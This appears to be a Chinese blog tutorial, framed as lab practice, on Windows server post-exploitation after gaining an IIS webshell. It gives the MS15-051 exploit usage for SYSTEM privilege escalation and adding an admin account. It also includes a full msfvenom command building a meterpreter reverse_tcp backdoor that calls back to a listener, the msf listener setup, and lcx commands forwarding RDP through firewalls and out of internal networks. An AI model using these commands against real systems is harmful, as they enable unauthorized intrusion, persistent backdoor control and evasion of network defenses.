0x01 前言

仅限于靶机,实战由于没大规模刷过shell或对方服务器安全软件等原因,所以暂时没实战提权。仅记录一下使用方法。

0x02 权限提升

假设我们已经获得了一个可以上传exp的webshell,webshell权限为iis的普通用户。

内核提权,基于MSF的内核溢出漏洞

MS15-051 (KB3045171)

ms15-051用法:ms15-051.exe "命令"

可见,使用ms15-051已获得了一个system权限的账户

添加账号

将账号加入管理员组

使用远程连接

账号权限为管理员

此类提权在shell管理工具即可使用,因为其不会打开新窗口,所以可以直接上传exp,执行,但是如果类似ms16-032这种会新建一个system权限的命令框怎么办呢,那就要用到msf反弹会话进行提权。这里暂且不说

0x03 利用msf后门对服务器进行持续控制

生成msf后门

:msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.150.141 lport=5000 -f exe -o /root/payload.exe

lhost为建立连接后靶机连接的地址 lport为监听的端口

生成后面文件后,将其上传至靶机。

启动攻击机的msf

使用reverse_tcp监听模块

set payload windows/meterpreter/reverse_tcp
set lhost 192.168.150.141#监听机器地址
set lport 5000#监听机器端口
exploit #开始监听

靶机执行后门程序,发起TCP连接

成功建立tcp连接

此时可以使用msf自带的getsystem进行提权

如果失败可以选用其它exp进行提权

0x04 端口转发

使用lcx.exe进行端口转发

两种情况需要用到端口转发工具

一:3389端口被防火墙限制无法通过,无论是对内还是对外

此时可以将该目标主机的3389端口转发到防火墙允许的其他端口,如53端口

命令:

lcx -tran 53 目标主机ip 3389

接下来连接靶机的53端口即可远程连接

二:对方机器为内网机器,无法直接使用远程连接连接

靶机:

lcx.exe -slave 公网主机ip 4444 127.0.0.1 3389

意思是将本地3389端口转发至公网的4444端口

公网主机:

lcx.exe –listen 4444 5555

将监听到的4444端口请求转发给5555端口

此时只需在公网主机本地连接3389即可 mstsc

输入127.0.0.1:5555

0x05 结语

未完待续

发表回复

您的电子邮箱地址不会被公开。 必填项已用 * 标注